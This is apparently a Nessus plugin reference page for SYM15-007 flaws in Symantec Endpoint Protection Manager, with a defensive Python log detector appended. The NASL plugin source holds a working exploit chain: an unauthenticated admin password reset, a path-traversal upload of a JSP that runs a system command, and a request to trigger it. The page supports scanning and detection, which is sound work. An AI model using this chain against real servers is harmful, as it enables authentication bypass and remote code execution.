Symantec Endpoint Protection Manager < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007) - Nessus

High   Plugin ID: 85351

This page contains detailed information about the Symantec Endpoint Protection Manager < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007) Nessus plugin, including the publicly available exploits and PoCs (on GitHub, in Metasploit or on Exploit-DB) that can be used to verify this vulnerability.

Plugin Overview


ID: 85351
Name: Symantec Endpoint Protection Manager < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007)
Filename: symantec_endpoint_prot_mgr_sym15-007_remote.nasl
Vulnerability Published: 2015-07-30
This Plugin Published: 2015-08-13
Last Modification Time: 2021-01-19
Plugin Version: 1.13
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: symantec_endpoint_prot_mgr_detect.nasl
Required KB Items [?]: installed_sw/sep_mgr

Vulnerability Information


Severity: High
Vulnerability Published: 2015-07-30
Patch Published: 2015-07-30
CVE [?]: CVE-2015-1486, CVE-2015-1487, CVE-2015-1489
CPE [?]: cpe:/a:symantec:endpoint_protection_manager

Synopsis

An application running on the remote host is affected by multiple vulnerabilities.

Description

The version of Symantec Endpoint Protection Manager (SEPM) running on the remote host is prior to 12.1 RU6 MP1. It is, therefore, affected by the following vulnerabilities:

- A flaw exists in the password reset functionality that allows a remote attacker, using a crafted password reset action, to generate a new administrative session, thus bypassing authentication. (CVE-2015-1486)

- A flaw exists related to filename validation in a console session that allows an authenticated, remote attacker to write arbitrary files. (CVE-2015-1487)

- An unspecified flaw exists that allows an authenticated, remote attacker to manipulate SEPM services and gain elevated privileges. (CVE-2015-1489)

Nessus attempts to use the authentication bypass flaw in conjunction with the arbitrary file upload and path traversal flaws to test the issue on the remote server. If this test succeeds, it is likely that the application is also affected by other vulnerabilities, including a SQL Injection.

Solution

Upgrade to Symantec Endpoint Protection Manager 12.1 RU6 MP1 or later.

Public Exploits


Target Network Port(s): 9090
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB, Core Impact, D2 Elliot)
Exploit Ease: No exploit is required

Here's the list of publicly known exploits and PoCs for verifying the Symantec Endpoint Protection Manager < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007) vulnerability:

  1. Metasploit: exploit/windows/http/sepm_auth_bypass_rce
    [Symantec Endpoint Protection Manager Authentication Bypass and Code Execution]
  2. Exploit-DB: exploits/windows_x86/remote/37812.rb
    [EDB-37812: Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution (Metasploit)]
  3. D2 Elliot: symantec_endpoint_protection_manager_file_upload.html
    [Symantec Endpoint Protection Manager File Upload]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information


CVSS V2 Vector [?]: AV:N/AC:M/Au:S/C:C/I:C/A:C/E:F/RL:OF/RC:C
CVSS Base Score: 8.5 (High)
Impact Subscore: 10.0
Exploitability Subscore: 6.8
CVSS Temporal Score: 7.0 (High)
CVSS Environmental Score: NA (None)
Modified Impact Subscore: NA
Overall CVSS Score: 7.0 (High)


Plugin Source


This is the symantec_endpoint_prot_mgr_sym15-007_remote.nasl nessus plugin source code. This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(85351);
  script_version("1.13");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_cve_id("CVE-2015-1486", "CVE-2015-1487", "CVE-2015-1489");
  script_bugtraq_id(76074, 76078, 76094);

  script_name(english:"Symantec Endpoint Protection Manager < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007)");
  script_summary(english:"Attempts to exploit the issue.");

  script_set_attribute(attribute:"synopsis", value:
"An application running on the remote host is affected by multiple
vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The version of Symantec Endpoint Protection Manager (SEPM) running
on the remote host is prior to 12.1 RU6 MP1. It is, therefore,
affected by the following vulnerabilities :

  - A flaw exists in the password reset functionality that
    allows a remote attacker, using a crafted password reset
    action, to generate a new administrative session, thus
    bypassing authentication. (CVE-2015-1486)

  - A flaw exists related to filename validation in a
    console session that allows an authenticated, remote
    attacker to write arbitrary files. (CVE-2015-1487)

  - An unspecified flaw exists that allows an authenticated,
    remote attacker to manipulate SEPM services and gain
    elevated privileges. (CVE-2015-1489)

Nessus attempts to use the authentication bypass flaw in conjunction
with the arbitrary file upload and path traversal flaws to test the
issue on the remote server. If this test succeeds, it is likely that
the application is also affected by other vulnerabilities, including
a SQL Injection.");
  # https://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?135bc3c2");
  # https://support.symantec.com/en_US/article.SYMSA1330.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?647383e8");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Symantec Endpoint Protection Manager 12.1 RU6 MP1 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Symantec Endpoint Protection Manager File Upload");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/07/30");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/07/30");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/08/13");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:symantec:endpoint_protection_manager");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("symantec_endpoint_prot_mgr_detect.nasl");
  script_require_keys("installed_sw/sep_mgr");
  script_require_ports("Services/www", 9090);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");

app = 'Symantec Endpoint Protection Manager';
get_install_count(app_name:"sep_mgr", exit_if_zero:TRUE); # Stops port branching

port = get_http_port(default:9090);

install = get_single_install(app_name:"sep_mgr", port:port);

url = build_url(port:port, qs:install["dir"]);
req = make_list();


# The first request takes a bit longer than most requests
http_set_read_timeout(30);
# First we make the request to reset the password
item ="/servlet/ConsoleServlet?ActionType=ResetPassword&UserID=admin&Domain=";
res  = http_send_recv3(
  port         : port,
  method       : "POST",
  item         : item,
  exit_on_fail : TRUE
);
# Bail out for unexpected response
if("200 OK" >!< res[0] || "Server: SEPM" >!< res[1])
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);
req[0] = http_last_sent_request();

time = unixtime();
file = "nessus_"+SCRIPT_NAME - ".nasl" + '-' + time + '.jsp';
dat  = '<%=new java.util.Scanner(Runtime.getRuntime().exec("ipconfig /all").getInputStream()).useDelimiter("\\\\A").next()%>';
item = "/servlet/ConsoleServlet?ActionType=BinaryFile&KnownHosts=.&Action=UploadPackage&PackageFile=../../../tomcat/webapps/ROOT/"+file;
res  = http_send_recv3(
  port         : port,
  method       : "POST",
  item         : item,
  data         : dat,
  exit_on_fail : TRUE
);
# Bail out for unexpected response
if("200 OK" >!< res[0] || "Server: SEPM" >!< res[1])
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);
req[1] = http_last_sent_request();

res = http_send_recv3(
  port         : port,
  method       : "GET",
  item         : "/"+file,
  exit_on_fail : TRUE
);
req[2] = http_last_sent_request();
# Bail out for unexpected response
if("200 OK" >!< res[0] || "Server: SEPM" >!< res[1])
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);
output = chomp(res[0]+res[1]+res[2]);

# Final check to make sure we were able to exploit
if("200 OK" >!< output ||  "Subnet Mask" >!< output)
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);

security_report_v4(
  port         : port,
  request      : req,
  output       : output,
  severity     : SECURITY_HOLE,
  rep_extra    : "Note: This file has not been removed by Nessus and will need to be manually deleted ("+file+")",
  cmd          : "ipconfig /all"
);
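The description and the plugin source above show the exact request chain the check relies on: a POST to ConsoleServlet with ActionType=ResetPassword (the CVE-2015-1486 bypass), a POST with ActionType=BinaryFile&Action=UploadPackage whose PackageFile walks out of the package directory with "../" (CVE-2015-1487), and finally a GET for the dropped .jsp under the ROOT web application. The following is an added example, not Tenable's code and not part of the plugin, that turns that chain into a detection for the defender: it parses Tomcat-style access log lines, tags the two ConsoleServlet requests, reports source addresses that issued both in order, and recognises the leftover artifact file whose name the plugin builds from SCRIPT_NAME and the Unix time (the plugin itself notes that this file is not removed and must be deleted by hand). The log format, the sample lines and the tag names are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed: the SEPM console is fronted by Tomcat writing common log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

CONSOLE_SERVLET = "/servlet/ConsoleServlet"

# The plugin names its dropped file "nessus_" + SCRIPT_NAME - ".nasl" + "-" + unixtime + ".jsp".
ARTIFACT_RE = re.compile(
    r"^nessus_symantec_endpoint_prot_mgr_sym15-007_remote-\d+\.jsp$"
)

# Constructed sample lines: one host running the full chain, one doing a normal package upload.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Aug/2015:10:00:01 +0000] "POST /servlet/ConsoleServlet?ActionType=ResetPassword&UserID=admin&Domain= HTTP/1.1" 200 512
203.0.113.7 - - [13/Aug/2015:10:00:03 +0000] "POST /servlet/ConsoleServlet?ActionType=BinaryFile&KnownHosts=.&Action=UploadPackage&PackageFile=../../../tomcat/webapps/ROOT/nessus_symantec_endpoint_prot_mgr_sym15-007_remote-1439460003.jsp HTTP/1.1" 200 0
203.0.113.7 - - [13/Aug/2015:10:00:04 +0000] "GET /nessus_symantec_endpoint_prot_mgr_sym15-007_remote-1439460003.jsp HTTP/1.1" 200 1337
198.51.100.9 - - [13/Aug/2015:10:05:00 +0000] "POST /servlet/ConsoleServlet?ActionType=BinaryFile&Action=UploadPackage&PackageFile=pkg.zip HTTP/1.1" 200 0
198.51.100.9 - - [13/Aug/2015:10:06:00 +0000] "GET /console/apps/sepm HTTP/1.1" 200 2048
"""


def is_nessus_artifact(filename):
    """True if a file name matches the .jsp the plugin leaves in tomcat/webapps/ROOT."""
    return ARTIFACT_RE.match(filename) is not None


def classify_request(method, target):
    """Tag one request, or return None when it is not part of the SYM15-007 chain."""
    parts = urlsplit(target)
    if is_nessus_artifact(parts.path.rsplit("/", 1)[-1]):
        return "nessus_artifact_request"
    if parts.path != CONSOLE_SERVLET:
        return None
    q = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    if q.get("ActionType") == "ResetPassword":
        return "sepm_password_reset"
    if q.get("ActionType") == "BinaryFile" and q.get("Action") == "UploadPackage":
        # Only a PackageFile that climbs out of the package directory is flagged;
        # an ordinary package upload is normal console behaviour.
        segments = unquote(q.get("PackageFile", "")).replace("\\", "/").split("/")
        if ".." in segments:
            return "sepm_upload_traversal"
    return None


def find_chains(events):
    """Source addresses that sent a password reset and then a traversing upload."""
    seen_reset, chains = set(), []
    for ip, tag in events:
        if tag == "sepm_password_reset":
            seen_reset.add(ip)
        elif tag == "sepm_upload_traversal" and ip in seen_reset and ip not in chains:
            chains.append(ip)
    return chains


def scan_log(lines):
    """Return tagged events in log order plus the addresses that completed the chain."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tag = classify_request(m.group("method"), m.group("target"))
        if tag:
            events.append((m.group("ip"), tag))
    return {"events": events, "chains": find_chains(events)}


if __name__ == "__main__":
    result = scan_log(SAMPLE_LOG.splitlines())
    for ip, tag in result["events"]:
        print(f"{ip}\t{tag}")
    print("chain completed by:", ", ".join(result["chains"]) or "none")
```

The reset request alone is worth alerting on: legitimate administrators do not reset the admin password through an unauthenticated ConsoleServlet POST, and a traversing PackageFile has no legitimate use. The artifact matcher doubles as a cleanup check; point it at the file names in tomcat/webapps/ROOT after an authorised scan to find the .jsp the plugin leaves behind.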

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/symantec_endpoint_prot_mgr_sym15-007_remote.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\symantec_endpoint_prot_mgr_sym15-007_remote.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/symantec_endpoint_prot_mgr_sym15-007_remote.nasl


How to Run


Here is how to run the Symantec Endpoint Protection Manager < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007) as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select Symantec Endpoint Protection Manager < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007) plugin ID 85351.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl symantec_endpoint_prot_mgr_sym15-007_remote.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a symantec_endpoint_prot_mgr_sym15-007_remote.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - symantec_endpoint_prot_mgr_sym15-007_remote.nasl -t <IP/HOST>

Run the plugin using a state file for the target and updating it (useful for running multiple plugins against the same target):

/opt/nessus/bin/nasl -K /tmp/state symantec_endpoint_prot_mgr_sym15-007_remote.nasl -t <IP/HOST>


References


BID | SecurityFocus Bugtraq ID: 76074, 76078, 76094

See also:
  • http://www.nessus.org/u?135bc3c2
  • http://www.nessus.org/u?647383e8

Similar and related Nessus plugins:
  • 85256 - Symantec Endpoint Protection Manager 11.x / 12.x < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007)
  • 81549 - Symantec Data Center Security Server SQLi (SYM15-001)
  • 81551 - Symantec Data Center Security Server 'environment.jsp' Information Disclosure (SYM15-001)
  • 53209 - Symantec LiveUpdate Administrator < 2.3 CSRF (SYM11-005)
  • 62010 - Symantec Messaging Gateway 9.5.x Multiple Vulnerabilities (SYM12-013)
  • 90919 - Symantec Messaging Gateway 10.x < 10.6.1 Management Console Multiple Vulnerabilities (SYM16-005)
  • 93653 - Symantec Messaging Gateway 10.x < 10.6.2 Multiple Vulnerabilities (SYM16-015) (SYM16-016)
  • 101158 - Symantec Messaging Gateway 10.x < 10.6.3-266 Multiple Vulnerabilities (SYM17-004)
  • 102528 - Symantec Messaging Gateway 10.x < 10.6.3-267 Multiple Vulnerabilities (SYM17-006)
  • 125357 - Symantec (Blue Coat) Reporter Denial of Service vulnerability (SYMSA1280)
  • 59208 - Symantec Web Gateway ipchange.php Shell Command Injection (SYM12-006) (intrusive check)
  • 61435 - Symantec Web Gateway Multiple Script Shell Command Execution (SYM12-011)
  • 61436 - Symantec Web Gateway search.php SQL Injection (SYM12-011)
  • 59209 - Symantec Web Gateway < 5.0.3 Multiple Vulnerabilities (SYM12-006) (version check)
  • 69179 - Symantec Web Gateway < 5.1.1 Multiple Vulnerabilities (SYM13-008)
  • 80118 - Symantec Web Gateway < 5.2.2 Authenticated OS Command Injection (SYM14-016)
  • 94052 - Symantec Web Gateway < 5.2.5 Management Console Command Injection (SYM16-017)
  • 59210 - Symantec Web Gateway upload_file() Remote Code Execution (SYM12-006) (intrusive check)

Version


This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file symantec_endpoint_prot_mgr_sym15-007_remote.nasl version 1.13. For more plugins, visit the Nessus Plugin Library.
